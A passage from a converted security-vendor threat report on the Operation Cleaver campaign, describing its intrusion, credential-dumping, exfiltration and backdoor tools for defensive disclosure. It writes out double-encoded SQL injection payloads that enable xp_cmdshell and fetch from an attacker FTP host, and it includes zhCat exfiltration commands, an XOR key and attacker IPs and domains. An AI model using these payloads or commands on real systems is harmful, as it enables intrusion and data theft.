 1329. %%%%%%*%,@%%  ((#(###@@@@@@@&%/&@@@#  *   #   #.        .(         .#@@@%##@#%//  /%%/%/#%%&/@#%&
 1330. %%%%%%%%*%@#  %%%&@%@@@@%%%%&%&%&%%   (   %   (.   ,      (     (#&&%%%%%%%(*%#&/(  (////%%@@/((&@@
 1331. %%%%%%*.%*((  ##%%((@@######%&%%%   #   #    %   *(      / #%%%&@@@%%%%%%%%/####  *//@@@@@@//@@##
 1332. %%%%%%&&(/((  @@%%%#&@%#@@@@@@&   (   #   .*    .#     (@&%%@@@@@%%%%%%%%(%%%/  /%%%%@%@@%/###(
 1333. %%%%%%(&*(((  &@@@&%((((&@@@@@@@@,*   #  .%#((.  .#        &@@@@@@@@@@@%%%%%%%%%%%  %%%%%%%%%@/%@@@
 1334. %%%%@@/#@@*@  /@@@%@@#@@@@@@@@@  &@,        /         ,@@@@@@@@@@@@@%@@@/%%%%( .%%%%%%%%%%%%%%@
 1335. %%%@@@@, &@@(  &@@@@%@@@@@#(%&/(% (*          (.          (#/((@@@@@@@@%&&(%%%%. %#%%%%%%%@%%&@@@
 1336. %%@&@@@,@,@%@. ,@@@@%@@@@(((%&@#            .%          /#%%%%%%/&&&@@@@@@#(#&/  @(#%%%%#(#%%%%@@
 1337. %%%&%@@@,@&&@@  @@@@@#@@@&@@%            .%%%,        *# /#%#%##%(#@@@@@@@@%%,%%  (@##%%%%%%%#@
 1338. %%%%#@@@@**%/  @@@@%#@@@@@,          /.  *%       (/  #%%###%@@@(@@@@@@%(/(%(  ,%%%%%#%%%%%%%%%%%
 1339. %%%%%%%%%%%.%,@#  @@@@@&@@@@&       .(       #    (/   ###%%%##%%%@@@@&%/*/,/(  *%%#%#%%%%%@@%%%%%%
 1340. %%%&@@#@@%## (%%(  @@@@%@@@@@%   .(%    ###(,         %%%%%%%%%%%/%%%@%/*&&@&  ,%%%%#%%#%%%%%%%%@@%
 1341. %%%%%#@@%@@%,/@*%#  %@@@@%@@@@@@&@@@&%               %%%%%%%%%%%%%#%%%%(#%%/  ,%%%%%#@@@@@@@@@@@@@@
 1342. %@@&%%%%%%%%@@%,/((,  (##%#%&@@@@@@#(#              .%%%@%%%%%%%%%/#/%@@@%   %%%%%%@@@@@@@@@@@@@@@@
 1343. %##%%%%%%@@%#*#* (&%(   #%#*&@@@@@#@@@              .%%%%%#(((%%%%%####%   ###%%%%@@@@@&@@@@@@@@@@@
 1344. %%%%%%%%%@%(#@%@**(.(%%   (#((#**#@@@&              .#######/########(   *%%%@&%&&@@&@@@@&@@@@@@@@@
 1345. %%%%%%%%%###@@@@ .(.@#@@@   .#/(%@@@&&              .%####%########,   (%@#@#@@@@@%@@@%%@@@@@@@@@@@
 1346. #%%%%@@@@@@@@##((@,@*(,(/%%.   ,&/&%##              .###########,   .##&@%@@@@@@@%@@&@&@@@@@@&%%@@%
 1347. #@@@@@@@@@@(@@@@@@@%@.#,%.((%%#     ,(              .##%#%%*    .#%%%%%%#@@@%@@%@@@@@@@@@@@@@@@@@@@
 1348. @@@@@@((((((@@@@@@@@((#@/, (*(%%%%&.                         &%%%%%%%&@@%#@&@@@@@@@@&@@@@@@@@@@@@@@
 1349. @@@@@@%%@@(@@@@@@@(((%%%%%%%* %.%,%%%%               ##////%&/%&@@%@%@@%&%&@@@@&&&@&@@@@@@@@@@@@@@@
 1350. &@@(%@@@@@@@@@@@%@%%%%%((%%%%%/#,%%%%%              /////////@@@@@@@@@@@@@@@@@@@@@#%((@@@%@@@#@@@@@
 1351. ((((%#@@%@@%##@@#%((%(%((#/////////#&/         ./&%%&&&/@@@@@@@@@@@@@@@@@@@@&@@@@@@@@@@(%%#%%%%%%%%
 1352. (###%%%%%@@%@%%%#@@%###%#/////%//@@&(/     (   ./&%%%%&@@@@@@%&/@@((/@@@@@###%@%@@@@@#%@@@@@@#@@%%%
 1353. (%%%%%%%%%%%##@@@#%%%%&&&&&&@/@@@@@/@#.%&&(/   ,&/%%%%%%@@@@@///%%////(@%%%%%%%%@@@%%@@@@@@@@@@%%%%
 1354. #@@%%%%%%%%%%%%%%%@@@@@@@@@@@@@@@@@&%%%%%%%%   .%@//(////////////////////@&%@%@@/@###%%%%((((((%%((
 1355. %%%%%%%%%%%%%%%@@@@@@@@@@@@@@/@@@@#%%%%%%%%%   ,@@@@&%@@@%//%////%/%%%%/@#@@@@@/@//@@@/%%%%%(((((%@
 1356. %%%%%%%%%%(%@@@@#%#(#((((@@(%%%%%%%%%@#@@     (@@@@@@@%@#@&%%%@@@@@@@@%&@@@@@///@@@#%%%(#%%%(#%%%
 1357. #%%%####(%%%@@@@(%(%(((((((((##%%%%%@@@@@@#******%&%%&&%&@@@@@@@@@@@@@@@@%%&@@@@@@@%%@%%@%%%%%%(%((
 1358. (%((%@##@@@%%((%%((((((((#####(&%%#@%#%%@@%%% (##@%%%%%%%&@@@@@@@@@@@@@@@@@@@@%@@@&&@%@@@@@@@@%%@((
 1359. (((((%%%@@%#((#%%%%@((((((%%#(#%%%%%%(((%,       .%%%%%%@@@@@@@@@@@@@@@@@@@@@@%@@@@@@@@@@@@@@@@@@@@
 1360. (((#((((%((%%%@@#@@@((((((@@%(%(%%%@@%%((         *@@@%&@@@@@@@@@@#@@@#%@@@@@@@@@@@@@@@@@@@@@@@@@@@
 1361. ##((#(###(@@@@@@@@@@@@#((@@%%%%%%%%%%%%((         ,@@#@@@@@@@@@@@@%@@@&%%#@@@@@@@@@@@@@@@@@@@@@@@@@
 1362. %%%%%%%%%%#@@@%@@%@@@#(%%%(##%%#(##%%((((         ,@&@@@@@@@@@@@@@@@&&@%@@@@%%@@@@@@@@@@@@@@@@@@@@&
 1363. @@@@@@@@@@@&@@@@@%%&@%@(((%%%%%%((((((((%     ... ,@@@@@@@@@@@(#%%%%%%#%%%%%%@#@%%%%%((%@@@@@@@%%%%
 1364. @@@@@@@@@@@@@@@@@@#(@@@@@(%%%%%((((%%((((((      @@@@@&%&@@@#(#%%%%%%%%%%#@@@@#%%%%%%%%%%%%##@@@(%%
 1365. %@@&%@@%%%@@@@@@%@(((((@((((#((#(%%%%%%%%%(      @@@&%%%@@@@%%%%@@%%%%#&%%%@&%%%%%%%%%%%%%((%%%%%%%
 1366. //#(%%%%%@@@@%%(((((((((((((((((%(#%%%##(##..,,, @@@&%@@@%%@@@@@@@%%%%%%%%%%%%%%%%@%%%%%%%((%%@@@%@
 1367. /#((/#%#(%%@(((%(%%%%%((((((#(((%%%%#(((%//..*** @@@@@@@@@#%%@%%%%%%%%%%%%%%@#%%%%%%%((((((((((((((
 1368.  
 1369. [ PG-31 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1370.  
 1371.  
 1372.  
 1373. [CYLANCE                                                                                  #OPCLEAVER]
 1374.  
 1375. TACTICS, TECHNIQUES & PROCEDURES
 1376.  
 1377. The Cleaver campaign used a variety of methods in multiple stages of attacks. In this section we’ll
 1378. cover the commonly observed methods during different stages of the attack.
 1379.  
 1380.  
 1381. INITIAL COMPROMISE
 1382.  
 1383. The initial compromise gets the attackers their first foothold into the target network. Once the
 1384. ability to execute arbitrary code has been established, an attacker’s job becomes quite a bit easier.
 1385. Since the vector of initial compromise is usually determined by what is vulnerable on the target,
 1386. we’ll cover just a few of the techniques we’ve seen Operation Cleaver use to initiate the compromise.
 1387.  
 1388.  
 1389. SQL Injection
 1390.  
 1391. SQL injection is a very common and simple attack method. It is made possible by a lack of input
 1392. sanitization by the vulnerable application before supplying that input into a SQL database query.
 1393. SQL injection payloads used by this organization have been double encoded. Double encoding SQL
 1394. injection payloads allows for bypassing of various anti-exploitation filters, such as those supplied
 1395. by Web Application Firewalls (WAFs).
 1396.  
 1397. The attackers would enable xp_cmdshell:
 1398.  
 1399. http://localhost/Demos/demo.cfm?Edit%26ID=111;declare%20@b1%20varchar(8000);set%20@ b1=%20show
 1400. advanced options;declare%20@b2%20varchar(8000);set%20@b2=%20xp_ cmdshell;%20EXEC%20master.dbo.
 1401. sp_configure%20@b1,%201;RECONFIGURE;EXEC%20master.dbo.sp_configure%20@b2,%201;RECONFIGURE;--%20
 1402.  
 1403. Then connect outbound via anonymous FTP:
 1404.  
 1405. http://localhost/Demos/demo.cfm?Edit%26ID=111;declare%20@b1%20varchar(8000);set%20@ b1=%20
 1406. ftp -A 108.175.152.230;%20exec%20master..xp_cmdshell%20@b1--%20
 1407.  
 1408. Spear-Phishing Campaign
 1409.  
 1410. Using messaging methods such as email, attackers can social engineer users into downloading and
 1411. executing software, which quietly installs malware alongside of the desired program. Operation
 1412. Cleaver has employed this technique numerous times across different organizations.
 1413.  
 1414. [ PG-32 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1415.  
 1416.  
 1417.  
 1418. [CYLANCE                                                                                  #OPCLEAVER]
 1419.  
 1420.  
 1421. EasyResumeCreatorPro.com
 1422.  
 1423. The domain EasyResumeCreatorPro.com was registered and a website setup which was a direct copy of a
 1424. legitimate website at winresume.com. This is how the original site looked:
 1425.  
 1426.  
 1427. [EWWW SCREENCAP!]
 1428.  
 1429. Figure 14: The original Easy Résumé Creator Pro website on winresume.com is legitimate.
 1430.  
 1431. [EWWW SCREENCAP!]
 1432.  
 1433. Figure 15: The fraudulent website, easyresumecreatorpro.com, is a fraudulent copy of the Easy Resume
 1434. Creator Pro website to lure job candidates to download and install their TinyZBot agent.
 1435.  
 1436. That’s not all they copied. In order to infect users, they combined the original Easy Resume Creator
 1437. Pro product with malware by using a binder they developed internally named Binder_1. A binder is an
 1438. application, which combines two executables (desired software and malware) into a single executable.
 1439.  
 1440. The resulting executable masquerades as the desired software. The purpose is deception, to make the
 1441. binder indistinguishable from the desired application. When executed, both applications are written
 1442. to a temporary directory and executed. This way it appears that the desired application was executed,
 1443. but the malware was also executed silently.
 1444.  
 1445. [ PG-33 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1446.  
 1447.  
 1448.  
 1449. [CYLANCE                                                                                  #OPCLEAVER]
 1450.  
 1451. Teledyne Résumé Submitter
 1452.  
 1453. [EWWW SCREENCAP!]
 1454.  
 1455. Figure 16: When the résumé submitting application is executed, a splash screen is displayed.
 1456.  
 1457. [EWWW SCREENCAP!]
 1458.  
 1459. Figure 17: Unable to connect to the Internet, the tool prompts the user for proxy configuration
 1460. information.
 1461.  
 1462. This attack evolved to appear more legitimate. The attackers made the victims feel like they had a
 1463. pending  job opportunity at the industrial conglomerate Teledyne. In order to take advantage of this
 1464. job opportunity, the victim needed to use the fake résumé submission application supplied by the
 1465. malicious recruiter. Multiple domains were registered in order to make the download sites seem more
 1466. realistic. These domains included other companies as they tried to hit a wider audience.
 1467.  
 1468. *       Teledyne-Jobs.com
 1469. *       Doosan-Job.com
 1470. *       NorthropGrumman.net
 1471.  
 1472. At this point, the résumé submission application checks the Internet connection. If it is unable to
 1473. connect to the Internet, it will display a window to input proxy information.
 1474.  
 1475. When this information is entered, the results are cached in a location the dropped malware can access.
 1476. After an Internet connection is ensured, the malware (TinyZbot) is dropped and executed. This clever
 1477. scheme makes sure the malware can connect to the command and control server, and increases the
 1478. chances that domain credentials are cached on the now infected machine. Shortly after, the main
 1479. application is launched.
 1480.  
 1481.  
 1482. [EWWW SCREENCAP!]
 1483.  
 1484. Figure 18: Final résumé submission form displays to the user while the malware runs freely in the
 1485. background.
 1486.  
 1487. [ PG-34 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1488.  
 1489.  
 1490.  
 1491. [CYLANCE                                                                                  #OPCLEAVER]
 1492.  
 1493.  
 1494. Teledyne Résumé Submitter (cont.)
 1495.  
 1496. The first résumé submission form requests contact information. This form, like the rest of the
 1497. submission forms, only stores the submitted information while the application is running. As the
 1498. infected user is going through and filling out all this information, the malware is running in the
 1499. background, logging their keystrokes, retrieving their stored passwords, etc. Once all the forms are
 1500. filled out, the user goes to the submission form.
 1501.  
 1502.  
 1503. [EWWW SCREENCAP!]
 1504.  
 1505. Figure 19: GET request to www.microsoft.com fakes the résumé submission.
 1506.  
 1507.  
 1508.  
 1509. When the victim hits submit, the résumé submitter does a GET request to microsoft.com in order to make
 1510. it seem like it is submitting something, then claims success.
 1511.  
 1512. This method is particularly effective not only because of its level of deception, but even if the
 1513. victim suspects that they are infected with malware, they are not as likely to speak up about it,
 1514. as they would need to explain why they were submitting a job application for another company.
 1515.  
 1516. [ PG-35 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1517.  
 1518.  
 1519.  
 1520. [CYLANCE                                                                                  #OPCLEAVER]
 1521.  
 1522.  
 1523. PRIVILEGE ESCALATION & PIVOTING
 1524.  
 1525. Privilege escalation is a category of techniques that describe the process of going from a less
 1526. privileged user on a compromised computer to a more privileged user. This increase in privileges
 1527. allows for the attacker to gain access to privleged areas of the operating system as well as to infect
 1528. other computers on the target network.
 1529.  
 1530. This team did not utilize any novel methods of privilege escalation, but they were observed using a
 1531. variety of publicly known exploits. PrivEsc is a compiled exploit, which leverages the vulnerability
 1532. commonly referred to as KiTrap0D (CVE-2010-0232). The exploit allows for escalation of privileges on
 1533. unpatched Windows operating systems from an unprivileged user to kernel-level privilege.
 1534.  
 1535.  
 1536. This vulnerability and the corresponding exploit were discovered and developed in 2010. The plagiarized
 1537. version used in Operation Cleaver was compiled in May 2013, with a slight modification to the public
 1538. source code. This modification changed the author’s details to Zhopin Exploit Team.
 1539.  
 1540. Pivoting is the process of leveraging access from one compromised computer in order to gain access to
 1541. additional systems on the target network. This can involve launching attacks from the compromised
 1542. computer, or simply abusing access once it has been gained.
 1543.  
 1544.  
 1545. Cached Credential Dumping
 1546.  
 1547. A very common method of pivoting on a predominantly Windows operating system based network is to
 1548. extract domain credentials which have been used on the compromised computer from a credential cache.
 1549. There are a few well-known tools which are capable of doing this given sufficient privileges on the
 1550. infected host. Two of these tools used by Cleaver are Mimikatz and Windows Credential Editor.
 1551.  
 1552.  
 1553. zhMimikatz and MimikatzWrapper
 1554.  
 1555. Two similar applications were developed by Operation Cleaver in order automate the execution of
 1556. Mimikatz. These applications are zhMimikatz and MimikatzWrapper. These applications store multiple
 1557. versions of Mimikatz in their resources. When executed, they determine which version of Mimikatz to
 1558. use based on whether the computer’s version of Windows is 32-bit or 64-bit. This technique is
 1559. uncommon in malware and shows the advanced skillset of the Cleaver team. Both tools were developed
 1560. in C#.
 1561.  
 1562. [ PG-36 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1563.  
 1564.  
 1565.  
 1566. [CYLANCE                                                                                  #OPCLEAVER]
 1567.  
 1568. zhMimikatz and MimikatzWrapper (cont.)
 1569.  
 1570. In the following examples, the computer name is TheComputerName, the username of the logged in user
 1571. is TheUser, and that user’s password is ThePassword. At the time of execution, the system only has
 1572. its own credentials available and no cached network credentials.
 1573.  
 1574. zhMimikatz
 1575.  
 1576. zhMimikatz executes the correct version of Mimikatz for the current system, and parses the results
 1577. for any cached credentials.
 1578.  
 1579. [EWWW SCREENCAP!]
 1580.  
 1581. Figure 20: zhMimikatz
 1582.  
 1583. [ PG-37 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1584.  
 1585.  
 1586.  
 1587. [CYLANCE                                                                                  #OPCLEAVER]
 1588.  
 1589. MimikatzWrapper
 1590.  
 1591. Output from MimikatzWrapper is essentially the same as zhMimikatz, despite being a different Visual
 1592. Studio project.
 1593.  
 1594. [EWWW SCREENCAP!]
 1595.  
 1596. Figure 21: The MimikatzWrapper.
 1597.  
 1598. The only external difference is that MimikatzWrapper also logs these results to res.txt in the
 1599. executing directory. This can make it useful for tools like the PVZ tool chain and Csext to execute
 1600. with logged results:
 1601.  
 1602. [EWWW SCREENCAP!]
 1603.  
 1604. Figure 22: The MimikatzWrapper dumps credentials out to a file.
 1605.  
 1606. [ PG-38 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1607.  
 1608.  
 1609.  
 1610. [CYLANCE                                                                                  #OPCLEAVER]
 1611.  
 1612. PsExec Spreading
 1613.  
 1614. Once an attacker has credentials extracted from the cache, whether in hash form or in plaintext form,
 1615. PsExec can be used to run commands on any other computer which accepts those domain credentials.
 1616. If this technique is combined with cached credential dumping, it can be used to jump from computer
 1617. to computer on a compromised network.
 1618.  
 1619.  
 1620. NetC (Net Crawler)
 1621.  
 1622. Net Crawler utilizes a cached credential dumping technique along with PsExec in order to worm
 1623. throughout a network, collecting any and all credentials that it can extract from credential caches.
 1624. It has the ability to do this with both Windows Credential Editor and Mimikatz. It starts by first
 1625. extracting cached credentials from the infected computer’s cache. Once this is complete, it then
 1626. continues to scan a set of configured IP addresses on the local subnet to determine which IP addresses
 1627. have SMB related ports open. Then an iterative methodology is applied to brute forcing each SMB enabled
 1628. target with each credential that was extracted from the cache.
 1629.  
 1630. When a positive result has been achieved, it will create a copy of itself with a modified configuration
 1631. stored as a PE resource, then send and execute the copy utilizing PsExec. This copy repeats the
 1632. behavior of the original, but with already discovered credentials as well as newly discovered ones on
 1633. the newly infected host. Any credentials found are reported back to the original infection.
 1634.  
 1635. [ PG-39 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1636.  
 1637.  
 1638.  
 1639. [CYLANCE                                                                                  #OPCLEAVER]
 1640.  
 1641. NetC (Net Crawler) cont.
 1642.  
 1643. The following is a sample of some of the recovered results of Net Crawler executing on a live network:
 1644.  
 1645. [EWWW SCREENCAP!]
 1646.  
 1647. Figure 23: The real output of a successfully run NetC effort at a victim organization.
 1648.  
 1649.  
 1650. A more in depth analysis of Net Crawler, as part of the A Study in Bots series, will be available on
 1651. Cylance’s blog.
 1652.  
 1653. [ PG-40 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1654.  
 1655.  
 1656.  
 1657. [CYLANCE                                                                                  #OPCLEAVER]
 1658.  
 1659. MS08-067 Exploit
 1660.  
 1661. MS08-067 is a vulnerability in Microsoft Windows made popular by the Conficker worm which can be
 1662. exploited by a specially crafted packet to the operating system’s RPC network interface. This
 1663. vulnerability has been patched since October 2008, but many networks have failed to update their
 1664. systems even to this day.
 1665.  
 1666. Operation Cleaver used a plagiarized version of a publicly available exploit for this vulnerability
 1667. developed in Python. Someone in the Cleaver team (presumed to be Nesha) modified the exploit to read
 1668. “By Nesha”.
 1669.  
 1670. Jasus
 1671.  
 1672. Jasus is an ARP cache poisoner developed by the Operation Cleaver team. It makes use of WinPcap and
 1673. is developed in C. Compared to some other publicly available ARP cache poisoning utilities, Jasus
 1674. is poorly developed and without many useful features. The primary positive attribute of Jasus is its
 1675. poor detection ratio by the antivirus industry.
 1676.  
 1677.  
 1678. Cain & Abel
 1679.  
 1680. Cain & Abel is a publicly available toolkit, which covers a wide range of functionality that assists
 1681. attackers once they have compromised a node on a network. It has the ability to dump stored and
 1682. cached credentials, and conduct attacks like ARP cache poisoning in order to capture credentials
 1683. being transmitted on the network. It also has a remotely installable trojan named Abel, which
 1684. enables some of its functionality on a remote target.
 1685.  
 1686. We observed the Operation Cleaver team using Cain & Abel for extracting credentials from caches and
 1687. the network when they are confident that there is little to no antivirus protection on the infected target.
 1688.  
 1689.  
 1690. EXFILTRATION
 1691.  
 1692. Exfiltration is the process of moving information to an external site. In this context, it is the
 1693. process of stealing information without being detected. Operation Cleaver has a strong focus on
 1694. stealing confidential/privileged information, and they have utilized a few methods in order to
 1695. facilitate this objective.
 1696.  
 1697. [ PG-41 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1698.  
 1699.  
 1700.  
 1701. [CYLANCE                                                                                  #OPCLEAVER]
 1702.  
 1703. Anonymous FTP Servers
 1704.  
 1705. Cleaver Operations observed in 2013 mainly utilized FTP servers with anonymous access enabled in
 1706. order to pilfer large quantities of information. This allowed them to use existing command line utilities
 1707. available on their targets in order to upload information. This is a versatile technique as it does
 1708. not require any additional software which could be detected. These FTP servers were also observed
 1709. during the infection process, as infected computers were often instructed to download additional
 1710. files from these FTP servers, including backdoors and pivoting tools.
 1711.  
 1712. The following IP addresses hosted FTP servers that were used in the infection of targets or in the
 1713. exfiltration of information.
 1714.  
 1715.  
 1716. * 108.175.152.230 – Santa Rosa, CA, USA
 1717. * 108.175.153.158 – Santa Rosa, CA, USA
 1718. * 184.82.181.48 – Pilot Mountain, North Carolina, USA
 1719. * 203.150.224.249 - Thailand
 1720. * 64.120.208.74 - Pilot Mountain, North Carolina, USA
 1721. * 64.120.208.75 - Pilot Mountain, North Carolina, USA&Z
 1722. * 64.120.208.76 - Pilot Mountain, North Carolina, USA
 1723. * 64.120.208.78 - Pilot Mountain, North Carolina, USA
 1724. * 66.96.252.198 - Pilot Mountain, North Carolina, USA
 1725.  
 1726. NetCat
 1727.  
 1728. NetCat is a network tool which has many valid purposes but can also be used for malicious purposes.
 1729. Its main functionality allows for a client and server communication channel, allowing for information
 1730. to be transported over the network simply. NetCat has an option when being compiled to enable or
 1731. disable the ability for NetCat to execute a command after the connection is established. This
 1732. feature can be abused to enable a reverse connecting shell, which can be used to remotely control a target.
 1733.  
 1734. NetCat’s network communications are in plaintext, and could be viewed by an egress filter looking
 1735. to block the exfiltration of sensitive information. The Operation Cleaver team was observed attempting
 1736. to use NetCat to exfiltrate information as well as use it as a reverse connecting shell. The use of
 1737. NetCat was later replaced with zhCat.
 1738.  
 1739. [ PG-42 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1740.  
 1741.  
 1742.  
 1743. [CYLANCE                                                                                  #OPCLEAVER]
 1744.  
 1745. zhCat
 1746.  
 1747. zhCat is a tool developed by the Operation Cleaver team which operates similarly to NetCat. Its main
 1748. purpose is to create a channel that is capable of transporting information over the network. The
 1749. changes made in zhCat allow for this information to be transferred with inline obfuscation and/ or
 1750. encryption. This makes it more difficult to detect that privileged information is being exfiltrated.
 1751.  
 1752. The command line help (of a particular version) shows the following options:
 1753.  
 1754. [EWWW SCREENCAP!]
 1755.  
 1756.  
 1757. Multiple obfuscation/encryption methods are available. The –h argument enables HTTP mode.
 1758. This makes the traffic between zhCat instances look like benign HTTP traffic. For instance, if the
 1759. attackers set up a zhCat instance listening on port 1000 on 192.168.116.128 in HTTP mode, the client
 1760. instance of zhCat would use the following command:
 1761.  
 1762. zhcat.exe –h –p 1000 –i 192.168.116.128
 1763.  
 1764. The server instance would use the following command:
 1765.  
 1766. zhcat.exe –l –h –p 1000
 1767.  
 1768. When we run both of these, we can send information just by typing it into the terminal of the running
 1769. application. Information can be supplied by standard input.
 1770.  
 1771. [EWWW SCREENCAP!]
 1772.  
 1773.  
 1774. [ PG-43 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1775.  
 1776.  
 1777.  
 1778. [CYLANCE                                                                                  #OPCLEAVER]
 1779.  
 1780. zhCat (cont.)
 1781.  
 1782. If we observe the network communications during this transfer, we can see the following HTTP POST request.
 1783.  
 1784. [EWWW SCREENCAP!]
 1785.  
 1786. Note: research into ebizmba.com did not turn up any additional evidence of being involved with the
 1787. development of zhCat.
 1788.  
 1789. On the server side, we can see our message has been received:
 1790.  
 1791. [EWWW SCREENCAP!]
 1792.  
 1793. If stricter egress filtering is enabled, the attackers can use zhCat to also XOR encrypt the traffic
 1794. with a shared key. These keys are stored inside zhCat. The following is the key used for XOR encryption:
 1795.  
 1796.  
 1797. Sorry! The handle to file %s is not a valid handle any more.\nSorry!
 1798. The handle to file %s is not a valid handle any more.
 1799.  
 1800. The \n represents hex character 0x0A, which is a new line character.
 1801.  
 1802. An attacker could set up a server instance of zhCat with the following command in order to enable both
 1803. HTTP and XOR obfuscation:
 1804.  
 1805. zhcat.exe –h –p 1000 –l –x
 1806.  
 1807. The client instance could then be invoked with the following command:
 1808.  
 1809. zhcat.exe –h –p 1000 –i 192.168.116.128 –x
 1810.  
 1811. Once again, information can be supplied via standard input.
 1812.  
 1813. [ PG-44 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1814.  
 1815.  
 1816.  
 1817. [CYLANCE                                                                                  #OPCLEAVER]
 1818.  
 1819. zhCat (cont.)
 1820.  
 1821.  
 1822. [EWWW SCREENCAP!]
 1823.  
 1824. Upon inspecting the network traffic again, we see the following HTTP POST request.
 1825.  
 1826. [EWWW SCREENCAP!]
 1827.  
 1828. On the server side, we can see this information being received:
 1829.  
 1830. [EWWW SCREENCAP!]
 1831.  
 1832. zhCat has a variety of other features such as port mirroring as well as traffic redirecting.
 1833.  
 1834.  
 1835. PLink
 1836.  
 1837. PLink is one of the many utilities provided in the PuTTY (SSH) suite, which has many benign purposes.
 1838. It is capable of communicating over various protocols, the most notable being SSH. The SSH protocol
 1839. is a heavily utilized encrypted protocol, most commonly used for remote administration of UNIX based
 1840. operating systems. PLink is designed to implement some of the SSH functions related to forwarding
 1841. traffic as well as other functionality.
 1842.  
 1843. Operation Cleaver uses PLink to forward local RDP ports to remote SSH servers. This allows them to
 1844. easily connect to RDP servers inside the networks of their victims. These RDP connections can be
 1845. used to exfiltrate information visually, as well as to remotely control the computers hosting the
 1846. RDP servers.
 1847.  
 1848. [ PG-45 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1849.  
 1850.  
 1851.  
 1852. [CYLANCE                                                                                  #OPCLEAVER]
 1853.  
 1854. SMTP
 1855.  
 1856. Early Cleaver operations abused SMTP in order to exfiltrate information. The sending is performed
 1857. by internally developed malware samples such as TinyZBot and Csext in order to exfiltrate information
 1858. about the infected computer, as well as requested files and keystroke logging information. Messages
 1859. were sent using an open SMTP relay at BeyondSys.com with  the sender email address
 1860. dyanachear(at)beyondsys.com. This allowed the attackers to use infrastructure that was not theirs
 1861. to exfiltrate information. The known recipient addresses of this information were
 1862. testmail_00001(at)yahoo.com and TerafficAnalyzer(at)yahoo. com. In order to deceive anyone reading
 1863. these emails, they made them appear to be a spam message that most would not think twice about. The
 1864. subject used is the following:
 1865.  
 1866. No Prescription required. Viagra Dosages: 25, 100, 150mg.
 1867. Fast worldwide delivery.
 1868.  
 1869. The message used is the following:
 1870.  
 1871. Buy Viagra150mg x 50 tablets for only $124.99!
 1872.  
 1873. No Prescription required. Viagra dosages: 150, 100, 25mg. Fast
 1874. Worldwide Delivery.
 1875.  
 1876. See the attachment movie.
 1877. Free bonus trip.
 1878. bestviagra4u.cn
 1879.  
 1880. The files being exfiltrated are added to the email as attachments.
 1881.  
 1882.  
 1883. SOAP
 1884.  
 1885. SOAP is a sub-protocol communicated via HTTP. In relation to Operation Cleaver, it is used as the
 1886. command and control protocol for TinyZBot, which was the preferred backdoor, and underwent long-term
 1887. development. HTTP communications are often used by botnets, but it is uncommon to use a sub-protocol
 1888. such as SOAP. It is likely that SOAP was used because it is simple to implement in C#, and has the
 1889. added benefit of blending in with other benign HTTP traffic.
 1890.  
 1891. As part of TinyZBot’s command and control protocol, files can be exfiltrated over SOAP to the command
 1892. and control server. For more information about TinyZBot, see the Persistence section.
 1893.  
 1894. [ PG-46 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1895.  
 1896.  
 1897.  
 1898. [CYLANCE                                                                                  #OPCLEAVER]
 1899.  
 1900. PERSISTENCE
 1901.  
 1902. Persistence is the means of maintaining access to a compromised network. There are limitless methods
 1903. of persistence; the following are techniques and tools for persistence used by Cleaver.
 1904.  
 1905.  
 1906. TinyZBot
 1907.  
 1908. TinyZBot is a backdoor developed in C#. This bot is the longest developed malware we have analyzed
 1909. from this organization. The earliest known version was compiled in January 2013 and we continued to
 1910. see new versions being created actively. The purpose of TinyZBot is to gather information from an
 1911. infected computer as well as maintain and further access into a compromised network.
 1912.  
 1913. TinyZBot was developed with the clear intention of targeted campaigns. The name TinyZBot is assumed
 1914. to be referring to this project as a less versatile version of the ZeuS botnet, although it does not
 1915. exhibit the major browser injection features of ZeuS. To be clear, TinyZBot shares no code with ZeuS
 1916. or its variants, and is developed in a different programming language. The majority of the code in
 1917. TinyZBot was created by Cleaver.
 1918.  
 1919.  
 1920. TinyZBot Features
 1921.  
 1922. TinyZBot supports a wide array of features that continually evolved over time. For the evolution of
 1923. features, see the History section. The following is a list of supported features:
 1924.  
 1925. *       SMTP exfiltration
 1926. *       Log keystrokes
 1927. *       Monitor clipboard activity
 1928. *       Enable a SOAP-based command and control channel
 1929. *       Self-updating
 1930. *       Download and execute arbitrary code
 1931. *       Capture screenshots
 1932. *       Extract saved passwords for Internet Explorer
 1933. *       Install as a service
 1934. *       Establish persistence by shortcut in startup folder
 1935. *       Provide unique malware campaign identifiers for tracking and control purposes
 1936. *       Deceptive execution methods
 1937. *       Dynamic backdoor configuration
 1938. *       FTP exfiltration
 1939. *       Security software detection
 1940. *       Ability to disable Avira antivirus
 1941. *       Ability to modify PE resources
 1942. *       Dynamic plugin structure
 1943.  
 1944. [ PG-4y Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 1945.  
 1946.  
 1947.  
 1948. [CYLANCE                                                                                  #OPCLEAVER]
 1949.  
 1950. TinyZBot Command and Control Protocol
 1951.  
 1952. The command and control mechanism for TinyZBot utilizes SOAP communicating over HTTP. Potential reasons
 1953. for using SOAP are:
 1954.  
 1955. 1.      SOAP-based communications are simple to implement in C#.
 1956. 2.      SOAP traffic could easily be considered benign traffic, as it is not commonly seen in malware.
 1957.  
 1958.  
